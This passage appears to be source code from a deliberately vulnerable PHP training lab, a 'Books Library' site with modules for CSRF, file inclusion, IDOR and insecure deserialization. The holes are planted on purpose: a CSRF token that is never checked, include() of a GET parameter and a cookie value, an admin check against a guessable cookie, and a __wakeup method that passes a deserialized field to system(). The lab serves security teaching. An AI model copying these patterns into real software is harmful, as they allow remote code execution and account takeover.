 7 |     die();
 8 | }
 9 | 
10 | ?>
11 | 
12 | <html>
13 |   <head>
14 |     <title>Books Library</title>
15 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
16 |     <link rel="stylesheet" type="text/css" href="style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a class="active" href="profile.php">Profile</a>
24 |         <a href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div>
28 |         <center>
29 |             <br><br><br><h3 id="type"></h3>
30 |         </center>
31 |     </div>
32 |     <script type="text/javascript">
33 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
34 |             i=0,
35 |             body=document.getElementById('bodyId');
36 |         body.onload = function(){
37 |             'use strict';
38 |             var typeWriter = setInterval(function(){
39 | 
40 |                 document.getElementById('type').innerHTML += msg[i];
41 |                 i = i + 1;
42 | 
43 |                 if(i>msg.length-1){
44 |                     clearInterval(typeWriter)
45 |                 }
46 |             }, 100);
47 |         }
48 |     </script>
49 |   </body>
50 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/cors/style/css.css:
--------------------------------------------------------------------------------
  1 | #name{
  2 |   width: 300px;
  3 |   height: 30px;
  4 |   text-align: center;
  5 |   border-radius: 4px;
  6 | }
  7 | input{border-style: solid;background: #f1f1f1;}
  8 | input[type="submit"]{
  9 |     width: 60px;
 10 |     height: 30px;
 11 | }
 12 | 
 13 | #fname, #email{
 14 |   height: 40px;
 15 |   text-align: center;
 16 | }
 17 | #send{
 18 |   background-color: dodgerblue;
 19 |   height: 40px
 20 | }
 21 | #msg{
 22 |   height: 200px;
 23 |   background: #f1f1f1;
 24 | }
 25 | 
 26 | #pwd,#uname,#fname, #email, #msg, #send{
 27 |   width: 400px;
 28 |   margin: 2px;
 29 |   border-style: solid;
 30 | }
 31 | 
 32 | #search{
 33 |   color: black;
 34 |   text-align: center;
 35 |   text-decoration: none;
 36 |   border-radius: 4px;
 37 | }
 38 | body{background: #f1f1f1;}
 39 | #type{
 40 |   width: 400px;
 41 | }
 42 | 
 43 | /* Style the header with a grey background and some padding */
 44 | .header {
 45 |   overflow: hidden;
 46 |   background-color: #f1f1f1;
 47 |   padding: 20px 10px;
 48 | }
 49 | 
 50 | /* Style the header links */
 51 | .header a {
 52 |   float: left;
 53 |   color: black;
 54 |   text-align: center;
 55 |   padding: 12px;
 56 |   text-decoration: none;
 57 |   font-size: 18px;
 58 |   line-height: 25px;
 59 |   border-radius: 4px;
 60 | }
 61 | 
 62 | /* Style the logo link (notice that we set the same value of line-height and font-size to prevent the header to increase when the font gets bigger */
 63 | .header a.logo {
 64 |   font-size: 25px;
 65 |   font-weight: bold;
 66 | }
 67 | 
 68 | /* Change the background color on mouse-over */
 69 | .header a:hover {
 70 |   background-color: #ddd;
 71 |   color: black;
 72 | }
 73 | 
 74 | /* Style the active/current link*/
 75 | .header a.active {
 76 |   background-color: dodgerblue;
 77 |   color: white;
 78 | }
 79 | 
 80 | /* Float the link section to the right */
 81 | .header-right {
 82 |   float: right;
 83 | }
 84 | 
 85 | /* Add media queries for responsiveness - when the screen is 500px wide or less, stack the links on top of each other */
 86 | @media screen and (max-width: 500px) {
 87 |   .header a {
 88 |     float: none;
 89 |     display: block;
 90 |     text-align: left;
 91 |   }
 92 |   .header-right {
 93 |     float: none;
 94 |   }
 95 | }
 96 | 
 97 | .be-comment-block {
 98 |     margin-bottom: 50px !important;
 99 |     border: 1px solid #edeff2;
100 |     border-radius: 2px;
101 |     padding: 50px 70px;
102 |     border:1px solid #ffffff;
103 | }
104 | 
105 | .comments-title {
106 |     font-size: 16px;
107 |     color: #262626;
108 |     margin-bottom: 15px;
109 |     font-family: 'Conv_helveticaneuecyr-bold';
110 | }
111 | 
112 | .be-img-comment {
113 |     width: 60px;
114 |     height: 60px;
115 |     float: left;
116 |     margin-bottom: 15px;
117 | }
118 | 
119 | .be-ava-comment {
120 |     width: 60px;
121 |     height: 60px;
122 |     border-radius: 50%;
123 | }
124 | 
125 | .be-comment-content {
126 |     margin-left: 80px;
127 | }
128 | 
129 | .be-comment-content span {
130 |     display: inline-block;
131 |     width: 49%;
132 |     margin-bottom: 15px;
133 | }
134 | 
135 | .be-comment-name {
136 |     font-size: 13px;
137 |     font-family: 'Conv_helveticaneuecyr-bold';
138 | }
139 | 
140 | .be-comment-content a {
141 |     color: #383b43;
142 | }
143 | 
144 | .be-comment-content span {
145 |     display: inline-block;
146 |     width: 49%;
147 |     margin-bottom: 15px;
148 | }
149 | 
150 | .be-comment-time {
151 |     text-align: right;
152 | }
153 | 
154 | .be-comment-time {
155 |     font-size: 11px;
156 |     color: #b4b7c1;
157 | }
158 | 
159 | .be-comment-text {
160 |     font-size: 13px;
161 |     line-height: 18px;
162 |     color: #7a8192;
163 |     display: block;
164 |     background: #f6f6f7;
165 |     border: 1px solid #edeff2;
166 |     padding: 15px 20px 20px 20px;
167 | }
168 | 
169 | .form-group.fl_icon .icon {
170 |     position: absolute;
171 |     top: 1px;
172 |     left: 16px;
173 |     width: 48px;
174 |     height: 48px;
175 |     background: #f6f6f7;
176 |     color: #b5b8c2;
177 |     text-align: center;
178 |     line-height: 50px;
179 |     -webkit-border-top-left-radius: 2px;
180 |     -webkit-border-bottom-left-radius: 2px;
181 |     -moz-border-radius-topleft: 2px;
182 |     -moz-border-radius-bottomleft: 2px;
183 |     border-top-left-radius: 2px;
184 |     border-bottom-left-radius: 2px;
185 | }
186 | .form-input{
187 |   border: 1px solid #000;
188 |   border-radius: 3px;
189 | }
190 | .form-group{
191 |   border: 1px solid #edeff2;
192 |   border-radius: 3px;
193 | }
194 | .form-group .form-input {
195 |     font-size: 13px;
196 |     line-height: 50px;
197 |     font-weight: 400;
198 |     color: #000;
199 |     width: 100%;
200 |     height: 50px;
201 |     padding-left: 20px;
202 |     padding-right: 20px;
203 | }
204 | 
205 | .form-group.fl_icon .form-input {
206 |     padding-left: 70px;
207 | }
208 | 
209 | .form-group textarea.form-input {
210 |     height: 150px;
211 | }


--------------------------------------------------------------------------------
/labs_docker/src/csrf/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/csrf/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="profile.php">Profile</a>
24 |         <a class="active" href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 |     	<center>
29 |     	<form method="POST">
30 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
31 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
32 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
33 |     	</form>
34 |     	</center>
35 |     </div>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/csrf/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 | 	header("Location: login.php");
 6 | 	die();
 7 | }
 8 | 
 9 | require("../config.php");
10 | 
11 | $csrfToken = md5("SECRET");
12 | 
13 | if( isset($_POST['csrfToken']) && isset($_POST['comment']) && $_POST['csrfToken'] == $csrfToken ){
14 |     $uname = htmlentities($_SESSION['username']);
15 |     $comment = htmlentities($_POST['comment']);
16 |     $link = "#";
17 |     $sql = "INSERT INTO comments values('$uname','$comment','$link')";
18 |     $res = mysqli_query($conn, $sql);
19 | }
20 | 
21 | $sql = "SELECT * FROM comments";
22 | 
23 | $result = mysqli_query($conn, $sql);
24 | 
25 | ?>
26 | <html>
27 |   <head>
28 |     <title>Books Library</title>
29 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
30 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
31 |   </head>
32 |   <body id="bodyId">
33 |     <div class="header">
34 |       <a href="index.php" class="logo">Books Library</a>
35 |       <div class="header-right">
36 |         <a href="index.php">Home</a>
37 |         <a class="active" href="profile.php">Profile</a>
38 |         <a href="settings.php">Settings</a>
39 |         <a href="login.php">Login</a>
40 |       </div>
41 |     </div>
42 |     <div class="container">
43 |     <div class="be-comment-block">
44 |         <div class="be-comment">
45 |         <?php
46 | 			while($rows=mysqli_fetch_array($result)){
47 | 			    echo '<span class="be-comment-name">';
48 | 			    echo '<a href="'.$rows['link'].'">'.$rows['uname'].'</a></span>';
49 | 			    echo '<p class="be-comment-text">'.$rows['comment'].'</p>';
50 | 			    echo '</div>';
51 | 			}
52 |         ?>
53 |         </div>
54 |         <form class="form-block" method="post">
55 |             <div class="row">
56 |                 <div class="col-xs-12">                         
57 |                     <div class="form-group">
58 |                         <textarea name="comment" class="form-input" required="" placeholder="Your text"></textarea><br>
59 |                         <input type="hidden" name="csrfToken" value="<?php echo $csrfToken;?>">
60 |                     </div>
61 |                 </div>
62 |                 <input style="width: 100px;" type="submit" value="Comment">
63 |             </div>
64 |         </form>
65 |     </div>
66 |     </div>
67 |   </body>
68 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/csrf/settings.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | require("../config.php");
 4 | if(isset($_POST['csrftoken']) && isset($_POST['nemail'])){
 5 | 
 6 |   $csrftoken = $_POST['csrftoken'];
 7 |   $newEmail = addslashes($_POST['nemail']);
 8 | 
 9 |   $sql2update = "UPDATE users_csrf SET email='$newEmail' WHERE username='guest';";
10 |   $res2update = mysqli_query($conn, $sql2update);
11 | 
12 | }
13 | 
14 | // if(isset($_POST['csrftoken']) && isset($_POST['nemail'])){
15 | //   if($_SESSION['t'] != $_POST['csrftoken']){
16 | //     echo "<script>alert('CSRF Token invalid.')</script>";
17 | //   }else{
18 | //     $csrftoken = $_POST['csrftoken'];
19 | //     $newEmail = addslashes($_POST['nemail']);
20 | 
21 | //     $sql2update = "UPDATE users_csrf SET email='$newEmail' WHERE username='guest';";
22 | //     $res2update = mysqli_query($conn, $sql2update);
23 | //   }
24 | // }
25 | 
26 | $token = md5(random_bytes(100));
27 | // $_SESSION['t'] = $token;
28 | 
29 | 
30 | $sql2getEmail = "SELECT email FROM users_csrf";
31 | $res2getEmail = mysqli_query($conn, $sql2getEmail);
32 | $rows = mysqli_fetch_array($res2getEmail);
33 | 
34 | ?>
35 | <html>
36 |   <head>
37 |     <title>Books Library</title>
38 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
39 |   </head>
40 |   <body id="bodyId">
41 |     <div class="header">
42 |       <a href="index.php" class="logo">Books Library</a>
43 |       <div class="header-right">
44 |         <a href="index.php">Home</a>
45 |         <a href="profile.php">Profile</a>
46 |         <a class="active" href="settings.php">Settings</a>
47 |         <a href="login.php">Login</a>
48 |       </div>
49 |     </div>
50 |     <div><br><br>
51 |     	<center>
52 |     		<h2>Email: <?php if($rows){echo $rows['email'];}?></h2>
53 |     		<hr>
54 |     	<form method="POST">
55 |     		
56 |     		<div>
57 |     			<input id="email" type="text" name="nemail" placeholder="New Email">
58 |     			<input type="hidden" name="csrftoken" value="<?php echo $token;?>">
59 |     		</div>
60 | 
61 |     		<input type="submit" id="send" value="Change" style="background-color: dodgerblue;">
62 |     	</form>
63 |     	</center>
64 |     </div>
65 |   </body>
66 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/add.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'fun.php';
 4 | $msg = "";
 5 | if(isset($_POST['url'])){
 6 |     $url = $_POST['url'];
 7 |     if(!strpos($url, ".json")){
 8 |         $msg = "Not allowed extension, try (json) extension.";
 9 |     }else{
10 |         $urlSplit = explode("/", $url);
11 |         $file = $urlSplit[count($urlSplit)-1];
12 |         get($url, $file);
13 |     }
14 | }
15 | 
16 | ?>
17 | <html>
18 |   <head>
19 |     <title>Books Library</title>
20 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
21 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
22 |   </head>
23 |   <body id="bodyId">
24 |     <div class="header">
25 |       <a href="index.php" class="logo">Books Library</a>
26 |       <div class="header-right">
27 |         <a href="index.php">Home</a>
28 |         <a href="profile.php">Profile</a>
29 |         <a class="active" href="add.php">Add</a>
30 |         <a href="login.php">Login</a>
31 |       </div>
32 |     </div>
33 |     <div>
34 |         <center>
35 |             <form method="post">
36 |                 <input id=email type="url" name="url" autocomplete="off" placeholder="URL to file"><br>
37 |                 <input id=send type="submit" value="get content">
38 |             </form>
39 |             <p><?php if($msg != ""){echo $msg;}?></p>
40 |         </center>
41 |     </div>
42 |   </body>
43 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/files/index.php:
--------------------------------------------------------------------------------
1 | <h1>Forbidden.</h1>


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/fun.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | function read($fileName){
 4 | 	@include $fileName;
 5 | }
 6 | 
 7 | function get($url, $name){
 8 | 	$ch = curl_init();
 9 | 	curl_setopt($ch, CURLOPT_URL, $url);
10 | 	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
11 | 	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
12 | 	$data = curl_exec($ch);
13 | 
14 | 	if(!$data){
15 | 		$data = @file_get_contents($url);
16 | 	}
17 | 	@file_put_contents("files/".$name, $data);
18 | }
19 | 
20 | function getFile($file){
21 | 	$path =__DIR__.$file;
22 | 	$open = @fopen($path,"r");
23 | 	$data = @fread($open,8192);
24 | 
25 | 	echo $data;
26 | 	@fclose($open);
27 | }


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'fun.php';
 4 | 
 5 | $f = @$_GET['f'];
 6 | $blocked = array('../');
 7 | 
 8 | if( !in_array($f, $blocked) ){
 9 |     getFile($f);
10 | }
11 | 
12 | // Delete lines fomr 5 to 10
13 | ?>
14 | <html>
15 |   <head>
16 |     <title>Books Library</title>
17 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
18 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
19 |   </head>
20 |   <body id="bodyId">
21 |     <div class="header">
22 |       <a href="index.php" class="logo">Books Library</a>
23 |       <div class="header-right">
24 |         <a class="active" href="index.php">Home</a>
25 |         <a href="profile.php">Profile</a>
26 |         <a href="add.php">Add</a>
27 |         <a href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div>
31 |         <center>
32 |             <br><br><br><h3 id="type"></h3>
33 |         </center>
34 |     </div>
35 |     <script type="text/javascript">
36 |         var msg = "Welcome.",
37 |             i=0,
38 |             body=document.getElementById('bodyId');
39 |         body.onload = function(){
40 |             'use strict';
41 |             var typeWriter = setInterval(function(){
42 | 
43 |                 document.getElementById('type').innerHTML += msg[i];
44 |                 i = i + 1;
45 | 
46 |                 if(i>msg.length-1){
47 |                     clearInterval(typeWriter)
48 |                 }
49 |             }, 100);
50 |         }
51 |     </script>
52 |   </body>
53 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		setcookie("msg","msg.txt",time()+3600);
 8 | 		setcookie("uid","2356452745678",time()+3600);
 9 | 		setcookie("sessionid","asdfS4DFJ3ty354yV4uyvuvSDFVg",time()+3600);
10 | 		header("Location: profile.php?f=msg.txt");
11 | 	}else{
12 | 		echo "<script>alert('Username/Password is invalid.')</script>";
13 | 	}
14 | }
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |     	<center>
32 |     	<form method="POST">
33 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
36 |     	</form>
37 |     	</center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/msg.txt:
--------------------------------------------------------------------------------
1 | Welcome To our website.We will servie you as best as we can, if you have any issue send to us.


--------------------------------------------------------------------------------
/labs_docker/src/file inclusion/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | include 'fun.php';
 5 | 
 6 | if($_SESSION['islogin'] != 1){
 7 |     header("Location: login.php");
 8 |     die();
 9 | }
10 | 
11 | ?>
12 | <html>
13 |   <head>
14 |     <title>Books Library</title>
15 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
16 |   </head>
17 |   <body id="bodyId">
18 |     <div class="header">
19 |       <a href="index.php" class="logo">Books Library</a>
20 |       <div class="header-right">
21 |         <a href="index.php">Home</a>
22 |         <a class="active" href="profile.php">Profile</a>
23 |         <a href="add.php">Add</a>
24 |         <a href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 | <div>
29 |         <center>
30 |             <br><br><br><h3 id="type"><?php @include $_COOKIE['msg']?></h3>
31 |             <br><br><br><h3 id="type"><?php @include $_GET['f']?></h3>
32 |         </center>
33 |     </div>
34 |     </div>
35 |   </body>
36 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/idor/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/idor/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 |     if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 |         $_SESSION['islogin'] = 1;
 6 |         $_SESSION['username'] = $_POST['uname'];
 7 |         setcookie("uid","a9b6b5a8a81a04a77ce3c809a94fda13",time()+3600);
 8 |         setcookie("sessionid","5de6277abc3a11b8ad3e5b7ce97aa5be",time()+3600);
 9 |         setcookie("dump","d9d4f495e875a2e075a1a4a6e1b9770f",time()+3600);
10 |         header("Location: profile.php");
11 |     }else{
12 |         echo "<script>alert('Username/Password is invalid.')</script>";
13 |     }
14 | }
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |         <center>
32 |         <form method="POST">
33 |             <input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |             <input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |             <input type="submit" value="Login" style="background-color: dodgerblue;">
36 |         </form>
37 |         </center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/idor/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 | 	header("Location: login.php");
 6 | 	die();
 7 | }
 8 | 
 9 | require("../config.php");
10 | 
11 | $csrfToken = md5("SECRET");
12 | 
13 | if( isset($_POST['userId']) && isset($_POST['comment']) ){
14 | 	$uname = htmlentities($_SESSION['username']);
15 | 	if($_COOKIE['uid'] == "c4ca4238a0b923820dcc509a6f75849b"){
16 | 		$uname = "Admin";
17 | 	}
18 |     $comment = htmlentities($_POST['comment']);
19 |     $link = "#";
20 |     $sql = "INSERT INTO comments values('$uname','$comment','$link')";
21 |     $res = mysqli_query($conn, $sql);
22 | }
23 | 
24 | $sql = "SELECT * FROM comments";
25 | 
26 | $result = mysqli_query($conn, $sql);
27 | 
28 | ?>
29 | <html>
30 |   <head>
31 |     <title>Books Library</title>
32 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
33 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
34 |   </head>
35 |   <body id="bodyId">
36 |     <div class="header">
37 |       <a href="index.php" class="logo">Books Library</a>
38 |       <div class="header-right">
39 |         <a href="index.php">Home</a>
40 |         <a class="active" href="profile.php">Profile</a>
41 |         <a href="login.php">Login</a>
42 |       </div>
43 |     </div>
44 |     <div class="container">
45 |     <div class="be-comment-block">
46 |         <div class="be-comment">
47 |         <?php
48 | 			while($rows=mysqli_fetch_array($result)){
49 | 			    echo '<span class="be-comment-name">';
50 | 			    echo '<a href="'.$rows['link'].'">'.$rows['uname'].'</a></span>';
51 | 			    echo '<p class="be-comment-text">'.$rows['comment'].'</p>';
52 | 			    echo '</div>';
53 | 			}
54 |         ?>
55 |         </div>
56 |         <form class="form-block" method="post">
57 |             <div class="row">
58 |                 <div class="col-xs-12">                         
59 |                     <div class="form-group">
60 |                         <textarea name="comment" class="form-input" required="" placeholder="Your text"></textarea><br>
61 |                         <input type="hidden" name="csrfToken" value="<?php echo $csrfToken;?>">
62 |                         <input type="hidden" name="userId" value="51324">
63 |                     </div>
64 |                 </div>
65 |                 <input style="width: 100px;" type="submit" value="Comment">
66 |             </div>
67 |         </form>
68 |     </div>
69 |     </div>
70 |   </body>
71 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta charset="UTF-8">
 5 |     <style>
 6 |         a,li,h1{
 7 |             color: white;
 8 |         }
 9 |         body{
10 |             background-color: #0A0A0A;
11 |         }
12 |     </style>
13 |     <meta name="viewport" content="width=device-width, initial-scale=1.0">
14 |     <title>Directory Links</title>
15 | </head>
16 | <body>
17 |     <h1>Directory Links</h1>
18 |     <ul>
19 |         <li><h3><a href="cors/">CORS</a></h3></li>
20 |         <li><h3><a href="csrf/">CSRF</a></h3></li>
21 |         <li><h3><a href="file inclusion/">File Inclusion</a></h3></li>
22 |         <li><h3><a href="idor/">IDOR</a></h3></li>
23 |         <li><h3><a href="insecuredes/">Insecure Deserialization</a></h3></li>
24 |         <li><h3><a href="jsonp/">JSONP</a></h3></li>
25 |         <li><h3><a href="postmessage/">Postmessage</a></h3></li>
26 |         <li><h3><a href="sql/">SQL</a></h3></li>
27 |         <!-- <li><h3><a href="style/">Style</a></h3></li> -->
28 |         <li><h3><a href="upload/">Upload</a></h3></li>
29 |         <li><h3><a href="xss/">XSS</a></h3></li>
30 |         <li><h3><a href="xxe/">XXE</a></h3></li>
31 |     </ul>    
32 | </body>
33 | </html>
34 | 


--------------------------------------------------------------------------------
/labs_docker/src/insecuredes/backup.bak:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | // updated
 4 | class User{
 5 | 	
 6 | 	public $u;
 7 | 	public $r;
 8 | 	public $dn;
 9 | 
10 | }
11 | 
12 | // still in use
13 | class getDate{
14 | 	public $command2GetDate;
15 | 
16 | 	function __construct($d){
17 | 		$this->command2GetDate = $d;
18 | 	}
19 | 
20 | 	function __wakeup(){
21 | 		system($this->command2GetDate);
22 | 	}
23 | }
24 | 
25 | 


--------------------------------------------------------------------------------
/labs_docker/src/insecuredes/classes.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class User{
 4 | 	
 5 | 	public $u;
 6 | 	public $r;
 7 | 	public $dn;
 8 | 
 9 | }
10 | 
11 | class getDate{
12 | 	public $command2GetDate;
13 | 
14 | 	function __construct($d){
15 | 		$this->command2GetDate = $d;
16 | 	}
17 | 
18 | 	function __wakeup(){
19 | 		system($this->command2GetDate);
20 | 	}
21 | }
22 | 
23 | ?>


--------------------------------------------------------------------------------
/labs_docker/src/insecuredes/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 5 |   </head>
 6 |   <body id="bodyId">
 7 |     <div class="header">
 8 |       <a href="index.php" class="logo">Books Library</a>
 9 |       <div class="header-right">
10 |         <a class="active" href="index.php">Home</a>
11 |         <a href="profile.php">Profile</a>
12 |         <a href="login.php">Login</a>
13 |       </div>
14 |     </div>
15 |     <div>
16 |         <center>
17 |             <br><br><br><h3 id="type"></h3>
18 |         </center>
19 |     </div>
20 |     <script type="text/javascript">
21 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
22 |             i=0,
23 |             body=document.getElementById('bodyId');
24 |         body.onload = function(){
25 |             'use strict';
26 |             var typeWriter = setInterval(function(){
27 | 
28 |                 document.getElementById('type').innerHTML += msg[i];
29 |                 i = i + 1;
30 | 
31 |                 if(i>msg.length-1){
32 |                     clearInterval(typeWriter)
33 |                 }
34 |             }, 100);
35 |         }
36 |     </script>
37 |   </body>
38 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/insecuredes/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'classes.php';
 4 | 
 5 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 6 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 7 | 
 8 | 		$_SESSION['islogin'] = 1;
 9 | 
10 | 		$userObj = new User();
11 |     $userObj->u = $_POST['uname'];
12 |     $userObj->r = "guest";
13 |     $userObj->dn = "Guest User";
14 | 
15 | 		setcookie("sessionid",base64_encode(serialize($userObj)),time()+3600);
16 | 
17 | 		header("Location: profile.php");
18 | 
19 | 	}else{
20 | 		echo "<script>alert('Username/Password is invalid.')</script>";
21 | 	}
22 | }
23 | ?>
24 | <html>
25 |   <head>
26 |     <title>Books Library</title>
27 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
28 |   </head>
29 |   <body id="bodyId">
30 |     <div class="header">
31 |       <a href="index.php" class="logo">Books Library</a>
32 |       <div class="header-right">
33 |         <a href="index.php">Home</a>
34 |         <a href="profile.php">Profile</a>
35 |         <a class="active" href="login.php">Login</a>
36 |       </div>
37 |     </div>
38 |     <div><br><br>
39 |     	<center>
40 |     	<form method="POST">
41 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
42 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
